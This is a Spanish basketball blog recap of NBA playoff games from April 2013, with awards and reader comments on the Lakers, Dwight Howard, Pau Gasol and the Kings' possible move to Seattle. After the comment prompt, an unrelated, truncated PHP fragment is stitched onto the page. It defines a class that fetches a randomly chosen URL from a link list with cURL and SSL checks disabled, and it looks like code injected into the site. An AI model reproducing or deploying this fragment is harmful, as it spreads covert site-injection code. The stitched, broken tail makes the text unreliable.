La Crónica: Es mejor así

29 de April de 2013 por txusma

kobe pgAfortunadamente, salvo contadas excepciones, el ser humano no puede ver sufrir a sus iguales. Siempre recibimos con alivio el final de la agonía de cualquiera, sea éste familiar, conocido o un simple extraño del que seguimos sus andanzas de lejos. Por eso, no puedo sino recibir con una mezcla de tristeza y alegría la barrida de los Lakers, el final de su particular calvario. Ya es triste que el objetivo por el que has luchado todo el año se convierta a la postre en una de tus peores pesadillas, en buena parte por culpa de la mala suerte. Kobe Bryant, Steve Nash, Metta World Peace, Steve Blake y Jodie Meeks, semejante lista de bajas no la soporta ninguna de la franquicias de la liga.

Como comentábamos, los Lakers se presentaron al partido con cinco bajas, todas ellas importantes, y un quinteto formado por 3 jugadores que a principio de temporada estaban destinados a ser despedidos (como de hecho había pasado con Goudelock) o disputar los minutos de la basura. Con semejantes mimbres es prácticamente imposible enfrentarse a esa máquina tan bien engrasada que son los Spurs y más todavía si el que está llamado a ser tu próximo jugador franquicia se autoexpulsa y deja a sus compañeros tirados en su última actuación antes de convertirse en agente libre. Al final de la primera parte ya había quedado el partido sentenciado. Los Lakers habían cometido muchas pérdidas intentando hacer llegar balones a sus hombres altos y los Spurs las habían aprovechado todas. Con la expulsión de Howard al inicio del tercer cuarto (‘casualmente’, momentos después de que Dwight se fuese al vestuario, Kobe salió en medio de una gran ovación y se sentó junto al banquillo), la segunda parte ya fue un paseo para los Spurs, que pudieron dar minutos a los no habituales, Tracy McGrady incluido (103-82). Greg Popovich y Tony Parker declararon al final del partido que no estaban del todo contentos porque no había sido un enfrentamiento justo. Seguro que ellos también tenían ganas de que la escabechina acabara.

Otros que han sido barridos, aunque en circunstancias totalmente diferentes, ha sido Milwaukee. Ninguna sorpresa, excepto para Brandon Jennings, del que cuentan que camino del vestuario todavía repetía que podían ganar 4-2. Dwyane Wade se quedó en el vestuario debido a sus problemas de tobillo pero con LeBron James y Ray Allen se bastaron para doblegar a unos decepcionantes Bucks. Nuevamente, el partido llegó igualado al último cuarto y, nuevamente, los Heat metieron una marcha más y se dedicaron a mirar por el retrovisor a ver si alguien les seguía. Un poco Monta Ellis, de lejos, pero ni rastro de Brandon Jennings (88-77). Los Heat se han ganado un merecido e importante descanso.

melo ppEl único equipo capaz de sacar el orgullo y evitar la barrida fueron, quién si no, los Celtics. No es que anduvieran sobrados los verdes, de nuevo calamitosos en la segunda mitad tras un magnífico arranque de encuentro, pero al menos pudimos reconocer a ese equipo que no se rinde y que impone su voluntad por encima de las circunstancias. Tal vez la era de Pierce & Garnett ha llegado a su fin, pero la despedida no iba a ser con un 4-0 en primera ronda, y efectivamente no lo fue. En parte hay que agradecérselo a Carmelo Anthony, que anoche recuperó su peor versión y se dedicó a lanzar ladrillo tras ladrillo, y con cada uno de ellos se iban las posibilidades de los Knicks. Sin JR Smith, sancionado por su codazo a Terry, esta vez fue Felton el encargado de castigar la mala segunda mitad de los Celtics, que llegaron a mandar por 20 puntos (39-59) antes de que el base de los Knicks acabase el tercer cuarto con una exhibición que dejó el marcador en un pañuelo. A punto estuvieron Pierce, Garnett y Green de empañar su notable actuación en el tramo final, cuando los Celtics se vieron atenazados ante la posible eliminación y cada posesión ofensiva resultaba un suplicio. Los fallos de Melo dejaron el partido en manos de Pierce, cuyo fallo en el posible game winner mandó el encuentro a la prórroga. Allí apareció entonces, al fin, tras meses desaparecido, Jason Terry. Jet anotó los 9 últimos puntos de su equipo en el tiempo extra y selló el triunfo local (90-97), que pone el 3-1 y manda la serie de vuelta a NY.

Idéntico tanteo presenta la serie entre Warriors y Nuggets después de la tercera victoria consecutiva de Golden State, una eliminatoria que Steph Curry está convirtiendo en su pasarela particular. El base se está luciendo en cada partido. Anoche, posiblemente afectado por el tobillo, le costó arrancar, pero llegó el tercer cuarto y apareció el mejor Curry. Además, lo hizo en el mejor momento, cuando Ty Lawson amenazaba con robarle el foco tras anotar 15 puntos seguidos sin fallo y liderar la remontada de los Nuggets. En los 4 minutos siguientes, Curry bailó a Andre Miller, metió 19 puntos, incluidos cinco triples, y sentenció. No hay que olvidar las inmensas contribuciones de Jarret Jack, sensacional con 21 puntos (8/9 en tiros) y 9 asistencias, de un Bogut muy recuperado (incluso se permitió devolverle el mate a McGee) y de Landry y Green desde el banquillo. Tal vez George Karl debería replantearse su apuesta por Wilson Chandler como center en esta serie, una decisión que no está dando réditos de ningún tipo a los Nuggets. Tras el 101-115 de anoche y con 3-1 para los Warriors, la eliminatoria vuela ahora a Denver para el quinto encuentro.

PREMIOS

curry gs

MVP: Se acaban los adjetivos para describir los Playoffs de Stephen Curry. ¿Os sugieren algo los 31 puntos, 10 de 16 en tiros de campo, 7 asistencias y 4 robos? LeBron James sigue a su ritmo habitual pero no por ellos menos espectacular: 30 puntos, 8 rebotes y 7 asistencias. 

Sorpresa: A Jarrett Jack el aro se le convirtió en piscina y se fue a los 21 puntos con un 8 de 9 en tiro. Además repartió 9 asistencias y cogió 5 rebotes. Parece que el small-ball le va que ni pintado.

Decepción: ¿10 de 35? ¿Estás de broma? Además, 20 tiros libres y 7 pérdidas de balón. Por el bien de los Knicks esperemos que no haya vuelto el Carmelo Anthony de los antiguos vicios. Más que decepcionante fue la actuación de Dwight Howard, que ante la lesión de Bryant dijo que era su momento para liderar y anoche volvió a evidenciar que en cuestiones de liderazgo le falta mucho por aprender.

Esfuerzo en vano: En ausencia de JR Smith (real) y Carmelo Anthony (figurada) fue Raymond Felton el que plantó cara a los Celtics pero sus 27 puntos fueron insuficientes para cerrar la eliminatoria. Dignísimo partido también de Pau Gasol (de nuevo ¿su último como Laker?), y más aun en contraste con el que protagonizó Dwight Howard.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    http://i.imgur.com/h3LRMD8.gif

    Bien, Dwight, bien…

      Citar

  2. txusma dice:
    #2

    Yo he escrito la parte de la crónica de los Lakers pero Magic ha escogido la foto de portada y he de decir que me encanta. Es una foto que refleja perfectamente la serie entre Spurs y Lakers. Kobe dando ánimos a Gasol como diciéndole: “Tranquilo, no has podido hacer más”. Y la foto es que con Pau pq ha sido él quien realmente ha intentado pelear hasta al final, al contrario que Dwight Howard. No sé que pasará este verano y es posible que los fríos números y el dinero provoque movimientos que no alegrarán a nadie, pero seguro que Kobe, por encima de límites salariales, preferiría 1000 veces que fuera Pau, el profesional que ha estado hasta el último momento aguantando la bandera, el que se quedara y no Dwight. No veo yo a la pareja Kobe-Dwight dando frutos y no por falta de calidad, claro.

      Citar

  3. Denise dice:
    #3

    MagicJohnson32:
    http://i.imgur.com/h3LRMD8.gif

    Bien, Dwight, bien…

    Pero ese puteo es a Kupchak, al arbitro ó a quien?

    Siempre he pensado que iba a renovar por L.A., pero tras el partido de ayer, veo a DH más fuera que dentro. Con sus actitudes infantiles, está tirando su carrera por la borda y si Lakers lo renuevan, creo que es más porque si no lo hacen se quedan en bragas en la pintura porque no tienen margen para fichar a nadie, que por que crean que es el futuro jugador franquicia.
    He estado leyendo opiniones en blogs, periodicos y foros locales, y cada vez son mas seguidores de Lakers en contra de Howard.

      Citar

  4. nba dice:
    #4

    Es que si este es el tipo sobre el que se tiene que sustentar Lakers, estamos apañados,
    yo lo veo facil, un sign-and-trade por Millsap+Jefferson,
    despedir a D’antoni y traer a Byron Scott.

      Citar

  5. Viva_Dirk dice:
    #5

    Si claro, después de la temporada de Howard te van a dar a Jefferson+Millsap por el. Un S&T me parece bastante dificil, no se que equipo va a dar una estrella y un buen jugador por Dwight que es lo que buscaran los Lakers, o alguna joven promesa.

    Mismamente en el ejemplo con Utah, en caso de que te den a Al Jefferson, dudo que incluyan a Hayward, Favors o Kanter.

      Citar

  6. Vader dice:
    #6

    Si claro, Howard firmará un sign&trade via Utah… Renovará por Lakers casi seguro. Al que no me extrañaria nada que traspasaran es a Gasol y supongo que tambien meremos alguna amnistia.

    Un traspaso de Howard lo veo muy improbable y creo que sólo iria a Dallas, Nets, Hawks o Knicks…

      Citar

  7. Esteban dice:
    #7

    y howard ha probado la miel y dudo que la deje, los lakers son el equipo mas conocido y famoso de todo el mundo, nadie que pisa ese suelo quiere irse, menos howard que le gustan las camaras mas que el baloncesto

    ahora si, sin kobe, con pau a la baja, nash muy muy a la baja y howard jugando un dia bien y un dia mal, como haran los lakers para meterse ene po el proximo año?

    no tienen el mas minimo margen, y jamision ya no renovara por el minimo,

    en mi opinion los lakrs, no deberian renovarle a howard, amnistiar a gasol o traspasarolo por espacio salarial, y comenzar a reconstruir

    ese nucleo lleva 3 años de dar pena en PO, lo barrieron los mavs y ahora los spurs, sin duda no es un grupo para llegar lejos

    blake, meeks y wold peace, morris, duhon y ebanks no estan a la altura de pelear poor el titulo

      Citar

  8. Ruxixón dice:
    #8

    Una cosa,si Howard no está contento con ese equipo,con el roster,con el protagonismo que le da el entrenador,etc,que se pire a un proyecto que piense que le “da” más.Sería la primera vez que actuara con madurez desde hace mucho tiempo (y dinero “sólo” palma 20 millones de un total de 120,en cualquier otro sitio se lleva 100 millones seguro).Lo que tengo claro es una no renovación de Howard da lugar a una secuencia de acontecimientos como la amnistía de MWP y el traspaso de Gasol.

    El 4-0 no sorprende a nadie a pesar de que los Lakers entraron en PO con esa inercia positiva que a la mayoría de los aficionados nos hizo pensar que podían dar más guerra,sensación engañosa motivada por el nombre que llevan en la camiseta.Por cierto,vaya manera de acabar las temporadas desde su último título,4-0 Dallas en 2011,4-1 Thunder en 2012 y este año otra serie desastrosa.

    Curry,desde luego no sé si será el mejor base o no entra en comparaciones con los míticos CP3,Rose,Parker…pero para mí es el base que más me transmite de toda la competición,es puro amor.

      Citar

  9. Denise dice:
    #9

    Un apunte de crónica rosa.

    – Jason Collins, el “más bueno” de los Hermanos Collins ha confesado que es gay.

      Citar

  10. Sancho88 dice:
    #10

    L.A. vive un mal momento. Ahora es tiempo de reflexionar y no cagarla coño. Vamos a ser coherentes. Tema Pau Gasol. Su contrato no lo quiere nadie, obviamente, pero el próximo año será su último año cobrando 19,2 millones. Recordemos que tiene aún 32 años (en julio cumplirá 33), y no hay que precipitarse. Con 33 años será agente libre, y él quiere seguir en Lakers al lado de Bryant. Es indudable que sabe que para seguir tendría que reducirse a la mitad su actual contrato, pero es indudable también que acaba de decir que quiere ganar otro título con Lakers, y esto es una declaración de intenciones. Yo creo que Pau ha demostrado de sobra lo que puede hacer por este equipo, y no creo que su motivación sea deambular por cualquier otro equipo cobrando 13-14 millones, si puede cobrar 10 en Lakers y seguir optando al anillo.

    Por tanto, desde el despacho de Kuptchak deberían replantearse en qué se quieren gastar el dinero el año que viene. Personalmente, no daría ni un duro por Howard, que se largue. No le haría ni una oferta. Adios.

    Después, vale que pagarán bastante pasta el año que viene en impuestos, pero sigo sin ver coherente amnistiar a Pau. Que amnistien a MWP, que ese tío sí que lo está pidiendo a gritos. Y luego, realmente Kobe y Pau, si realmente quieren ganar algo, deben saber que el año que viene es de transición, para recuperarse físicamente, y que el próximo verano tienen que ponerse salarios normales para poder atraer jugones y optar al anillo. Al estilo Miami, que los cracks ninguno pasa de 17 millones (actualmente). No puede ser que ahora mismo Pau y Bryant cobren lo mismo juntos que el trío de Miami…

    Y, por último, Kuptchack debe echar a la mierda de D’Antoni y traer de nuevo a Phil.

    Y, desde ahí, empezar a reconstruir, con base salarial, con un equipo al que todo el mundo quiere ir, con el trío Bryant-Pau-Nash en 2014-2015 cobrando 40 millones entre los tres, y con jugadores jóvenes que realmente merezcan jugar en Lakers.

    Otra opción sería firmar un sign and trade con Howard. Creo que buscar un traspaso a Seattle estaría bastante bien. Howard por Cousins+Tyreke Evans.

      Citar

  11. melo15 dice:
    #11

    Das por hecho lo de Seattle Sancho?
    Con todo el respeto, creo que el equipo ya no tiene nada que hacer en Sacramento y que mas vale irse a una ciudad con un mercado mas grande, con mas historia y con unos dueños comprometidos.
    Creo que si al final se trasladan a Seattle estos Kings van a mejorar mucho, aunque ahora toca reconstruir otra vez desde zero.

      Citar

  12. Sancho88 dice:
    #12

    Claro que lo doy por hecho. Los ricos de Sacramento solo ponen 350 kilos, y los de Seattle, aparte de que tienen “las escrituras” (por decirlo a la española) del equipo en sus manos firmadas por los Maloof, ponen 550 millones y proyecto de pabellón nuevo o reconstrucción del Key Arena. En Sacramento ha llegado a haber hasta tres proyectos distintos de pabellón, es un mercado mucho menor y hay menos pasta. Blanco y en botella.

    Desde el día que Ron Burkle se cayó del proyecto, hace dos semanas o así, la movida ya se sabía. El indio no se moja, y el ruso tampoco. Y la ciudad no va a poner tanta pasta. El modelo de negocio de Stern es a la larga, no quiere más jaleos de equipos arruinados y tal, y por eso, para mantener el equipo en Sacramento (un mercado de mierda), quería que los inversores privados igualasen la oferta de Hansen en Seattle, (para asegurar que iban a crear plantillas competitivas) y esto no ha sucedido. De haber continuado Burkle, el trío Burkle, Mastrov y Ranidivé (o como se diga), más el apoyo de Kevin Johnson, la cláusula de preferencia local y tal… igual hoy la votación era fifty&fifty, pero se cayó el ricachón Burkle y ya no hay nada más que hacer.

    Hansen win seguramente. Esto es el triunfo de la pasta, simple y llanamente. Los Nets se piran a Brooklyn, los Warriors a San Francisco (próximamente), y así sucesivamente. Si alguien pone más pasta se lleva cualquier equipo mierdoso a donde le salga de los huevos. Como digo, es el modelo Stern. Él se pira ahora y este es su último sello. En ningún momento ha apostado por los sentimentalismos de Sacramento, y ahora ningún gran dirigente lo va a hacer. Seattle vende como marca y como proyecto, y punto

      Citar

  13. melo15 dice:
    #13

    Si se quedaran en SacTown te quedarias con Cousins o no? Porque Evans se pira fijo.

      Citar

  14. Ruxixón dice:
    #14

    El Cómite de Traslados ha votado de forma unánime a la no relocalización de los Kings en Seattle,dicho en cristiano,Sacramento sigue en la NBA “de momento”.

      Citar

  15. Denise dice:
    #15

    Sancho88:
    Claro que lo doy por hecho. Los ricos de Sacramento solo ponen 350 kilos, y los de Seattle, aparte de que tienen “las escrituras” (por decirlo a la española) del equipo en sus manos firmadas por los Maloof, ponen 550 millones y proyecto de pabellón nuevo o reconstrucción del Key Arena. En Sacramento ha llegado a haber hasta tres proyectos distintos de pabellón, es un mercado mucho menor y hay menos pasta. Blanco y en botella.

    Desde el día que Ron Burkle se cayó del proyecto, hace dos semanas o así, la movida ya se sabía. El indio no se moja, y el ruso tampoco. Y la ciudad no va a poner tanta pasta. El modelo de negocio de Stern es a la larga, no quiere más jaleos de equipos arruinados y tal, y por eso, para mantener el equipo en Sacramento (un mercado de mierda), quería que los inversores privados igualasen la oferta de Hansen en Seattle, (para asegurar que iban a crear plantillas competitivas) y esto no ha sucedido. De haber continuado Burkle, el trío Burkle, Mastrov y Ranidivé (o como se diga), más el apoyo de Kevin Johnson, la cláusula de preferencia local y tal… igual hoy la votación era fifty&fifty, pero se cayó el ricachón Burkle y ya no hay nada más que hacer.

    Hansen win seguramente. Esto es el triunfo de la pasta, simple y llanamente. Los Nets se piran a Brooklyn, los Warriors a San Francisco (próximamente), y así sucesivamente. Si alguien pone más pasta se lleva cualquier equipo mierdoso a donde le salga de los huevos. Como digo, es el modelo Stern. Él se pira ahora y este es su último sello. En ningún momento ha apostado por los sentimentalismos de Sacramento, y ahora ningún gran dirigente lo va a hacer. Seattle vende como marca y como proyecto, y punto

    ¿Pero los propietarios de la NBA no han votado en contra del traslado? Creo haber leido hace unas horas que Sacramento permanecía en la NBA.

      Citar

  16. KB # 24 dice:
    #16

    Habéis visto el triple de Stephen Curry mirando al banquillo de Denver? Espectaculo del bueno! Este chico tiene algo mágico! Es pura clase!

      Citar

  17. rumbero dice:
    #17

    Denise: ¿Pero los propietarios de la NBA no han votado en contra del traslado? Creo haber leido hace unas horas que Sacramento permanecía en la NBA.

    Queda la votación oficial de los propietarios pero parece que se van a quedar en Sacramento finalmente cuando parecía justo lo contrario. Stern además ha dicho que de expansión de liga nada, o al menos no se hablará hasta que se firme el nuevo contrato televisivo. Así que o en Seattle buscan nueva presa o vamos a estar algunos añitos más sin los Sonics parece

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>